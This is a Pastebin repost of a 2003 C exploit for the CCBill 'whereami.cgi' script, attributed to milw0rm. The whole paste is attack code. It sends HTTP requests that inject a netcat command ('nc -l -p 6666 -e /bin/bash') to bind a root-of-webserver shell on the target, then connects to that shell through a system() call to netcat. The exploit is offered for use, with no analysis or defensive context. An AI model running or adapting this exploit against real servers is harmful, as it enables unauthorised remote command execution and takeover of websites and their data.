API tools faq
paste
Advertisement
FlyFar

CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution

FlyFar
Feb 2nd, 2024
846
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.74 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2. * =====================================
  3. * CCBILL CGI Remote Exploit for /ccbill/whereami.cgi
  4. * By: Knight420
  5. * 7/07/03
  6. *
  7. * spawns a shell with netcat and attempts to connect
  8. * into the server on port 6666 to gain access of the
  9. * webserver uid
  10. *
  11. * (C) COPYRIGHT Blue Ballz , 2003
  12. * all rights reserved
  13. * =====================================
  14. *
  15. */
  16.  
  17. #include <sys/types.h>
  18. #include <sys/time.h>
  19. #include <sys/socket.h>
  20. #include <netinet/in.h>
  21. #include <arpa/inet.h>
  22. #include <unistd.h>
  23. #include <errno.h>
  24. #include <stdlib.h>
  25. #include <stdio.h>
  26. #include <string.h>
  27. #include <fcntl.h>
  28. #include <netdb.h>
  29.  
  30.  
  31. unsigned long int   net_resolve (char *host);
  32. int         net_connect (struct sockaddr_in *cs, char *server,
  33.             unsigned short int port, int sec);
  34.  
  35. unsigned char ccbill[] =
  36. "GET /ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
  37. "GET /cgi-bin/ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
  38. "GET /cgi-bin/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a";
  39.  
  40. int
  41. main (int argc, char **argv)
  42. {
  43.     int         socket;
  44.     char  *TARGET     =     "TARGET";
  45.     char            *server;
  46.     unsigned short int  port;
  47.     struct sockaddr_in  sa;
  48.  
  49.     if (argc != 3) {
  50.         system("clear");
  51.         printf ("[CCBILL CGI Remote Exploit By:Knight420]\n"
  52.         "usage: %s <host> <port>\n");
  53.         exit (EXIT_FAILURE);
  54.     }
  55.     setenv (TARGET, argv[1], 1);
  56.     server = argv[1];
  57.     port = atoi (argv[2]);
  58.  
  59.     socket = net_connect (&sa, server, port, 35);
  60.     if (socket <= 0) {
  61.         perror ("net_connect");
  62.         exit (EXIT_FAILURE);
  63.     }
  64.  
  65.     write (socket, ccbill, strlen (ccbill));
  66.     sleep (1);
  67.     close (socket);
  68.  
  69.     printf ("[CCBILL CGI Remote Exploit By:Knight420]\n");
  70.     printf ("[1] evil data sent.\n", server);
  71.     printf ("[2] connecting to shell.\n", server);
  72.     system("nc ${TARGET} 6666 || echo '[-]Exploit failed!'");
  73.     exit (EXIT_SUCCESS);
  74. }
  75.  
  76. unsigned long int
  77. net_resolve (char *host)
  78. {
  79.     long        i;
  80.     struct hostent  *he;
  81.  
  82.     i = inet_addr (host);
  83.     if (i == -1) {
  84.         he = gethostbyname (host);
  85.         if (he == NULL) {
  86.             return (0);
  87.         } else {
  88.             return (*(unsigned long *) he->h_addr);
  89.         }
  90.     }
  91.  
  92.     return (i);
  93. }
  94.  
  95.  
  96. int
  97. net_connect (struct sockaddr_in *cs, char *server,
  98.     unsigned short int port, int sec)
  99. {
  100.     int     n, len, error, flags;
  101.     int     fd;
  102.     struct timeval  tv;
  103.     fd_set      rset, wset;
  104.  
  105.     /* first allocate a socket */
  106.     cs->sin_family = AF_INET;
  107.     cs->sin_port = htons (port);
  108.     fd = socket (cs->sin_family, SOCK_STREAM, 0);
  109.     if (fd == -1)
  110.         return (-1);
  111.  
  112.     cs->sin_addr.s_addr = net_resolve (server);
  113.     if (cs->sin_addr.s_addr == 0) {
  114.         close (fd);
  115.         return (-1);
  116.     }
  117.  
  118.     flags = fcntl (fd, F_GETFL, 0);
  119.     if (flags == -1) {
  120.         close (fd);
  121.         return (-1);
  122.     }
  123.     n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
  124.     if (n == -1) {
  125.         close (fd);
  126.         return (-1);
  127.     }
  128.  
  129.     error = 0;
  130.  
  131.     n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
  132.     if (n < 0) {
  133.         if (errno != EINPROGRESS) {
  134.             close (fd);
  135.             return (-1);
  136.         }
  137.     }
  138.     if (n == 0)
  139.         goto done;
  140.  
  141.     FD_ZERO(&rset);
  142.     FD_ZERO(&wset);
  143.     FD_SET(fd, &rset);
  144.     FD_SET(fd, &wset);
  145.     tv.tv_sec = sec;
  146.     tv.tv_usec = 0;
  147.  
  148.     n = select(fd + 1, &rset, &wset, NULL, &tv);
  149.     if (n == 0) {
  150.         close(fd);
  151.         errno = ETIMEDOUT;
  152.         return (-1);
  153.     }
  154.     if (n == -1)
  155.         return (-1);
  156.  
  157.     if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
  158.         if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
  159.             len = sizeof(error);
  160.             if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
  161.                 errno = ETIMEDOUT;
  162.                 return (-1);
  163.             }
  164.             if (error == 0) {
  165.                 goto done;
  166.             } else {
  167.                 errno = error;
  168.                 return (-1);
  169.             }
  170.         }
  171.     } else
  172.         return (-1);
  173. done:
  174.     n = fcntl(fd, F_SETFL, flags);
  175.     if (n == -1)
  176.         return (-1);
  177.  
  178.     return (fd);
  179. }
  180.  
  181. // milw0rm.com [2003-07-10]
  182.            
Tags: Exploit Vulnerability
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!